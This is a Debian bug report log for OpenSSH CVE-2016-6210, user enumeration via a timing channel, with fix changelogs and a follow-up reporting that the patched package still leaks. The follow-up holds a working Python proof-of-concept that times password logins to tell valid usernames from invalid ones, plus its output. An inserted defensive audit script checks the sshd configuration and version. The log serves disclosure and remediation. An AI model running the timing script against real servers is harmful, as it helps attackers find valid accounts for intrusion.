openssh: CVE-2016-6210: User enumeration via covert timing channel

Debian Bug report logs - #831902

Reported by: Salvatore Bonaccorso <carnil@debian.org>

Date: Wed, 20 Jul 2016 17:27:01 UTC

Severity: important

Tags: patch, security, upstream

Found in versions openssh/1:6.0p1-4, openssh/1:6.0p1-3, openssh/1:6.7p1-5, openssh/1:7.2p2-5

Fixed in versions openssh/1:6.0p1-4+deb7u5, openssh/1:6.7p1-5+deb8u3, openssh/1:7.2p2-6

Done: Laszlo Boszormenyi (GCS) <gcs@debian.org>

Bug is archived. No further changes may be made.

Report forwarded to debian-bugs-dist@lists.debian.org, carnil@debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Debian OpenSSH Maintainers <debian-ssh@lists.debian.org>:
Bug#831902; Package src:openssh. (Wed, 20 Jul 2016 17:27:05 GMT)


Acknowledgement sent to Salvatore Bonaccorso <carnil@debian.org>:
New Bug report received and forwarded. Copy sent to carnil@debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Debian OpenSSH Maintainers <debian-ssh@lists.debian.org>. (Wed, 20 Jul 2016 17:27:05 GMT)


Message #5 received at submit@bugs.debian.org:

From: Salvatore Bonaccorso <carnil@debian.org>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: openssh: CVE-2016-6210: User enumeration via covert timing channel
Date: Wed, 20 Jul 2016 19:23:09 +0200
Source: openssh
Version: 1:7.2p2-5
Severity: important
Tags: security upstream patch

Hi,

the following vulnerability was published for openssh.

CVE-2016-6210[0]:
User enumeration via covert timing channel

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2016-6210
[1] http://seclists.org/fulldisclosure/2016/Jul/51

Please adjust the affected versions in the BTS as needed.

Regards,
Salvatore



Marked as found in versions openssh/1:6.7p1-5. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Thu, 21 Jul 2016 19:51:08 GMT)


Reply sent to Colin Watson <cjwatson@debian.org>:
You have taken responsibility. (Fri, 22 Jul 2016 17:27:58 GMT)


Notification sent to Salvatore Bonaccorso <carnil@debian.org>:
Bug acknowledged by developer. (Fri, 22 Jul 2016 17:27:58 GMT)


Message #12 received at 831902-close@bugs.debian.org:

From: Colin Watson <cjwatson@debian.org>
To: 831902-close@bugs.debian.org
Subject: Bug#831902: fixed in openssh 1:7.2p2-6
Date: Fri, 22 Jul 2016 17:26:14 +0000
Source: openssh
Source-Version: 1:7.2p2-6

We believe that the bug you reported is fixed in the latest version of
openssh, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 831902@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Colin Watson <cjwatson@debian.org> (supplier of updated openssh package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Fri, 22 Jul 2016 17:06:19 +0100
Source: openssh
Binary: openssh-client openssh-client-ssh4 openssh-server openssh-sftp-server ssh ssh-krb5 ssh-askpass-gnome openssh-client-udeb openssh-server-udeb
Architecture: source
Version: 1:7.2p2-6
Distribution: unstable
Urgency: medium
Maintainer: Debian OpenSSH Maintainers <debian-ssh@lists.debian.org>
Changed-By: Colin Watson <cjwatson@debian.org>
Description:
 openssh-client - secure shell (SSH) client, for secure access to remote machines
 openssh-client-ssh4 - secure shell (SSH) client for legacy SSH1 protocol
 openssh-client-udeb - secure shell client for the Debian installer (udeb)
 openssh-server - secure shell (SSH) server, for secure access from remote machines
 openssh-server-udeb - secure shell server for the Debian installer (udeb)
 openssh-sftp-server - secure shell (SSH) sftp server module, for SFTP access from remot
 ssh        - secure shell client and server (metapackage)
 ssh-askpass-gnome - interactive X program to prompt users for a passphrase for ssh-ad
 ssh-krb5   - secure shell client and server (transitional package)
Closes: 714526 751636 766887 822997 823827 831902
Changes:
 openssh (1:7.2p2-6) unstable; urgency=medium
 .
   * debian/watch: Switch to HTTP (thanks, Nicholas Luedtke; closes:
     #822997).
   * Copy summary of supported SFTP protocol versions from upstream's
     PROTOCOL file into the openssh-sftp-server package description (closes:
     #766887).
   * Set SSH_PROGRAM=/usr/bin/ssh4 when building openssh-client-ssh4 so that
     scp1 works (reported by Olivier MATZ).
   * Retroactively add a NEWS.Debian entry for the UseDNS change in 6.9 (see
     LP #1588457).
   * CVE-2016-6210: Mitigate user enumeration via covert timing channel
     (closes: #831902).
   * Backport upstream patch to close ControlPersist background process
     stderr when not in debug mode or when logging to a file or syslog
     (closes: #714526).
   * Add a session cleanup script and a systemd unit file to trigger it,
     which serves to terminate SSH sessions cleanly if systemd doesn't do
     that itself, often because libpam-systemd is not installed (thanks,
     Vivek Das Mohapatra, Tom Hutter, and others; closes: #751636).
   * Stop generating DSA host keys by default (thanks, Santiago Vila; closes:
     #823827).
Checksums-Sha1:
 2170a722d423c610aebff6c7d46851fb88316348 2837 openssh_7.2p2-6.dsc
 74c23afda7155665754613e32106434aa5ae105f 154028 openssh_7.2p2-6.debian.tar.xz
Checksums-Sha256:
 2e071288cb930a73414d8cd2c4050b8db583970df13ec7ee47a0150c87b8382e 2837 openssh_7.2p2-6.dsc
 d02a0ad674537b470348807e522496f3c06f7893bfd11b5de809a9cfa5b1176f 154028 openssh_7.2p2-6.debian.tar.xz
Files:
 6b199afe03c15f81d0e758383fee1200 2837 net standard openssh_7.2p2-6.dsc
 15f3b542b8e3378a329acd5eb86ac9a8 154028 net standard openssh_7.2p2-6.debian.tar.xz





Reply sent to Laszlo Boszormenyi (GCS) <gcs@debian.org>:
You have taken responsibility. (Sun, 24 Jul 2016 19:06:04 GMT)


Notification sent to Salvatore Bonaccorso <carnil@debian.org>:
Bug acknowledged by developer. (Sun, 24 Jul 2016 19:06:04 GMT)


Message #17 received at 831902-close@bugs.debian.org:

From: Laszlo Boszormenyi (GCS) <gcs@debian.org>
To: 831902-close@bugs.debian.org
Subject: Bug#831902: fixed in openssh 1:6.7p1-5+deb8u3
Date: Sun, 24 Jul 2016 19:02:57 +0000
Source: openssh
Source-Version: 1:6.7p1-5+deb8u3

We believe that the bug you reported is fixed in the latest version of
openssh, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 831902@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Laszlo Boszormenyi (GCS) <gcs@debian.org> (supplier of updated openssh package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Thu, 21 Jul 2016 15:51:59 +0000
Source: openssh
Binary: openssh-client openssh-server openssh-sftp-server ssh ssh-krb5 ssh-askpass-gnome openssh-client-udeb openssh-server-udeb
Architecture: source amd64 all
Version: 1:6.7p1-5+deb8u3
Distribution: jessie-security
Urgency: high
Maintainer: Debian OpenSSH Maintainers <debian-ssh@lists.debian.org>
Changed-By: Laszlo Boszormenyi (GCS) <gcs@debian.org>
Description:
 openssh-client - secure shell (SSH) client, for secure access to remote machines
 openssh-client-udeb - secure shell client for the Debian installer (udeb)
 openssh-server - secure shell (SSH) server, for secure access from remote machines
 openssh-server-udeb - secure shell server for the Debian installer (udeb)
 openssh-sftp-server - secure shell (SSH) sftp server module, for SFTP access from remot
 ssh        - secure shell client and server (metapackage)
 ssh-askpass-gnome - interactive X program to prompt users for a passphrase for ssh-ad
 ssh-krb5   - secure shell client and server (transitional package)
Closes: 831902
Changes:
 openssh (1:6.7p1-5+deb8u3) jessie-security; urgency=high
 .
   * Non-maintainer upload by the Security Team.
   * CVE-2016-6210: User enumeration via covert timing channel
     (closes: #831902).
Checksums-Sha1:
 bff143012193cc818be87fb2cc85a701e4dd94fc 2709 openssh_6.7p1-5+deb8u3.dsc
 7c31b32b12a8b9aadc9b3e8fbee3b56dc8f0795f 150272 openssh_6.7p1-5+deb8u3.debian.tar.xz
 868ac10a0246f4601fb91075e5999cca4b4e21ab 690360 openssh-client_6.7p1-5+deb8u3_amd64.deb
 725cfad83f996522a8a83e7119d53a6da67398d0 331268 openssh-server_6.7p1-5+deb8u3_amd64.deb
 2af338add69ac295737b61d718b92dca84d9ebba 37996 openssh-sftp-server_6.7p1-5+deb8u3_amd64.deb
 7addc7869745a752f2af72d3499da3f37b435274 119790 ssh_6.7p1-5+deb8u3_all.deb
 f00b777707ce403ec1cc2e6851a8f5d281d91748 119334 ssh-krb5_6.7p1-5+deb8u3_all.deb
 d50a45e202a6e66594ed050493b4135516c9a527 127466 ssh-askpass-gnome_6.7p1-5+deb8u3_amd64.deb
 6b7b8b1d27ed4ca3581894dac5827cc895cfff88 259646 openssh-client-udeb_6.7p1-5+deb8u3_amd64.udeb
 ebbe59699881d10e25233a3db9ea1f40f615d63d 286308 openssh-server-udeb_6.7p1-5+deb8u3_amd64.udeb
Checksums-Sha256:
 3680d33c9638af9d0f249bee3444b490b0a1fa4ea11a04e1b97fe6e081ce8537 2709 openssh_6.7p1-5+deb8u3.dsc
 a2f486b45310b86816fbd5b85ad61493d9b07ac3290a7b4f773747e7a47b6759 150272 openssh_6.7p1-5+deb8u3.debian.tar.xz
 0cfb382650c3263349f4829f3423833c650cb0c665b731be66d5d72f9779099d 690360 openssh-client_6.7p1-5+deb8u3_amd64.deb
 0376c483b3bfe1c12e87744b11391a47c8f40eecce629c00176535a716761a58 331268 openssh-server_6.7p1-5+deb8u3_amd64.deb
 19d84f32345060bbc79522f8e9ed773d28a37edb5d9cd8cf83384f27f848a220 37996 openssh-sftp-server_6.7p1-5+deb8u3_amd64.deb
 257a7a22101067758b9b95792d3f6f5705b8a5b00b14f0ef63553db28b4eb45e 119790 ssh_6.7p1-5+deb8u3_all.deb
 78bfef7c0299c70fc35aa9af601d2512ffb63bffd32ee75dbd92fa4885528a8a 119334 ssh-krb5_6.7p1-5+deb8u3_all.deb
 e56238724132239d530fd7cd92679b4e4f5b6bc4c4b9dec1c5f543b82c2dbd03 127466 ssh-askpass-gnome_6.7p1-5+deb8u3_amd64.deb
 463a40912de0499820501026ee29284ab4429b97a24cac34c1b9ff6be410f243 259646 openssh-client-udeb_6.7p1-5+deb8u3_amd64.udeb
 938912669db7b2bc924e3ac202c8142342334e12b018db2a8fb0bc3ec1dd61a9 286308 openssh-server-udeb_6.7p1-5+deb8u3_amd64.udeb
Files:
 4a60c718008cad0c665a7e354a9d02da 2709 net standard openssh_6.7p1-5+deb8u3.dsc
 c95ae888817d1c3cb77453453846f32e 150272 net standard openssh_6.7p1-5+deb8u3.debian.tar.xz
 1d6685072b0fbb99480eba30d2da0d46 690360 net standard openssh-client_6.7p1-5+deb8u3_amd64.deb
 7dce77acd12b801bb5d5d901f4380d3f 331268 net optional openssh-server_6.7p1-5+deb8u3_amd64.deb
 c29c13fd32670a16464b805a41790608 37996 net optional openssh-sftp-server_6.7p1-5+deb8u3_amd64.deb
 18ab5922af1b6841078eb9bab46cb2ef 119790 net extra ssh_6.7p1-5+deb8u3_all.deb
 1f779b09429f37d9d3a37c9b59370c45 119334 oldlibs extra ssh-krb5_6.7p1-5+deb8u3_all.deb
 995528c208b70003a697fbd9b52aa577 127466 gnome optional ssh-askpass-gnome_6.7p1-5+deb8u3_amd64.deb
 c657a8c5bfb1043a7e62bba3134e81ca 259646 debian-installer optional openssh-client-udeb_6.7p1-5+deb8u3_amd64.udeb
 fc39fa3123e64058e1bec2201a169e5c 286308 debian-installer optional openssh-server-udeb_6.7p1-5+deb8u3_amd64.udeb





Information forwarded to debian-bugs-dist@lists.debian.org, Debian OpenSSH Maintainers <debian-ssh@lists.debian.org>:
Bug#831902; Package src:openssh. (Wed, 27 Jul 2016 03:27:03 GMT)


Acknowledgement sent to Michael Van Delft <michael@xo.tc>:
Extra info received and forwarded to list. Copy sent to Debian OpenSSH Maintainers <debian-ssh@lists.debian.org>. (Wed, 27 Jul 2016 03:27:03 GMT)


Message #22 received at 831902@bugs.debian.org:

From: Michael Van Delft <michael@xo.tc>
To: 831902@bugs.debian.org
Subject: SSH User Enumeration issue still present
Date: Wed, 27 Jul 2016 11:02:24 +0800
I have installed this patch on a few servers however the timing issue still
seems to be present.

I tried setting up a fresh server using the netinst .iso file and I only
installed the "SSH server" package in the Software selection stage (no other
packages were installed or configuration changes made). I ensured that all the
packages were up to date.

michael@ssh-test-box:~$ sudo sshd -v
[sudo] password for michael: 
unknown option -- v
OpenSSH_6.7p1 Debian-5+deb8u3, OpenSSL 1.0.1t  3 May 2016
usage: sshd [-46DdeiqTt] [-b bits] [-C connection_spec] [-c host_cert_file]
            [-E log_file] [-f config_file] [-g login_grace_time]
            [-h host_key_file] [-k key_gen_time] [-o option] [-p port]
            [-u len]

Then I ran the POC code (below) and valid users took 22 seconds to fail while
invalid users took around 3 seconds.

Setting PasswordAuthentication no in /etc/ssh/sshd_config mitigates this issue.

[michael@ezreal ~]$ python ssh_test.py 
user: alice
0:00:02.039722
[michael@ezreal ~]$ python ssh_test.py 
user: bob
0:00:02.613451
[michael@ezreal ~]$ python ssh_test.py 
user: michael
0:00:22.195203
[michael@ezreal ~]$ python ssh_test.py 
user: eve
0:00:03.564072


# ssh_test.py
import paramiko
from datetime import datetime

user = input("user: ")
p = 'A' * 25000  # long password, as in the original test
ssh = paramiko.SSHClient()
starttime = datetime.now()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
    ssh.connect('ssh-test-box.internal', username=user, password=p)
except Exception:
    pass
finally:
    # record the end time whether the attempt failed or (unexpectedly)
    # succeeded, so that 'endtime' is always defined below
    endtime = datetime.now()
    ssh.close()
total = endtime - starttime
print(total)
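The report above makes two points a defender needs to check separately: the package version claimed to be fixed, and the observed timing difference only went away once PasswordAuthentication was set to no. The following is an added example, not code from this bug log or from the OpenSSH project, of a small audit that checks both. It parses the effective configuration that `sshd -T` prints and the version line sshd prints with its usage message (the same shape as the one quoted in the thread), flags PasswordAuthentication unless it is `no`, and reports whether the running version is one of the three this bug log marks as fixed. The function names and the two sample inputs are constructed for the example; the version check is an exact comparison against the page's fixed-version list, not a full Debian version ordering.

```python
import re
from typing import Dict, List

# Versions this bug log (#831902) records as fixed, with the Debian epoch
# ("1:") stripped so they can be compared with what the sshd banner reports.
FIXED_VERSIONS = {"6.0p1-4+deb7u5", "6.7p1-5+deb8u3", "7.2p2-6"}

# Constructed sample of `sshd -T` output: the effective configuration, one
# lowercased keyword per line. Only a handful of keywords are shown here.
SAMPLE_SSHD_T = """\
port 22
addressfamily any
passwordauthentication yes
pubkeyauthentication yes
challengeresponseauthentication no
usepam yes
"""

# Constructed sample of the version line sshd prints with its usage message,
# in the same shape as the one quoted in the thread.
SAMPLE_BANNER = "OpenSSH_6.7p1 Debian-5+deb8u3, OpenSSL 1.0.1t  3 May 2016"


def parse_sshd_t(text: str) -> Dict[str, List[str]]:
    """Parse `sshd -T` output into {keyword: [values...]}.

    Keywords that may repeat (hostkey, listenaddress, ...) collect all their
    values; everything else ends up with a single-element list.
    """
    config: Dict[str, List[str]] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        keyword, _, value = line.partition(" ")
        config.setdefault(keyword.lower(), []).append(value.strip())
    return config


def debian_version_from_banner(banner: str) -> str:
    """Turn 'OpenSSH_6.7p1 Debian-5+deb8u3, ...' into '6.7p1-5+deb8u3'.

    Returns '' when the banner carries no Debian revision.
    """
    m = re.search(r"OpenSSH_(\S+?) Debian-([^\s,]+)", banner)
    if not m:
        return ""
    return f"{m.group(1)}-{m.group(2)}"


def audit(sshd_t_output: str, banner: str) -> List[str]:
    """Return human-readable findings; an empty list means nothing to flag."""
    findings: List[str] = []
    config = parse_sshd_t(sshd_t_output)

    version = debian_version_from_banner(banner)
    if version not in FIXED_VERSIONS:
        findings.append(
            f"sshd version {version or 'unknown'} is not one of the versions "
            "#831902 records as fixed"
        )

    # The thread reports the timing difference persisting on the patched
    # package while password authentication is enabled, and disappearing once
    # PasswordAuthentication is no; so the setting is checked regardless of
    # the version result. OpenSSH's default for the keyword is yes.
    password_auth = config.get("passwordauthentication", ["yes"])[0]
    if password_auth != "no":
        findings.append(
            "PasswordAuthentication is enabled; set 'PasswordAuthentication no' "
            "in /etc/ssh/sshd_config and reload sshd"
        )
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_SSHD_T, SAMPLE_BANNER):
        print("FINDING:", finding)
```

On a real host the two inputs come from `sshd -T` (run as root, since it reads the host keys) and from the version line sshd prints on its usage output; with the sample inputs above the version check passes and the only finding is the enabled password authentication, which mirrors what the report describes on its freshly installed, fully updated test box.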



Marked as found in versions openssh/1:6.0p1-4. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sun, 31 Jul 2016 04:27:04 GMT)


Marked as fixed in versions openssh/1:6.0p1-4+deb7u5. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sun, 31 Jul 2016 04:27:06 GMT)


Marked as found in versions openssh/1:6.0p1-3. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sun, 31 Jul 2016 04:54:04 GMT)


Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sun, 11 Sep 2016 07:26:21 GMT)


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Jun 19 15:38:56 2019; Machine Name: buxtehude